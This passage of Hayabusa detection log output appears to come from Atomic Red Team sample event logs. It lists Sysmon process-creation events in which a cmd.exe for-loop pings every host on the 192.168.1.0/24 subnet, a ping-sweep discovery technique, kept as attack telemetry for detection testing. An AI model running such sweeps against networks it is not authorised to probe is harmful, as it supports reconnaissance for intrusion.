User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 
747F3D96-D933-5D31-0000-001098AF3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 747F3D96-D936-5D31-0000-00102EC73500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 747F3D96-D939-5D31-0000-001090E23500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 
747F3D96-D93A-5D31-0000-00105FF83500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D93C-5D31-0000-0010B5053600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 
747F3D96-D942-5D31-0000-001013323600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 747F3D96-D946-5D31-0000-0010904C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | 
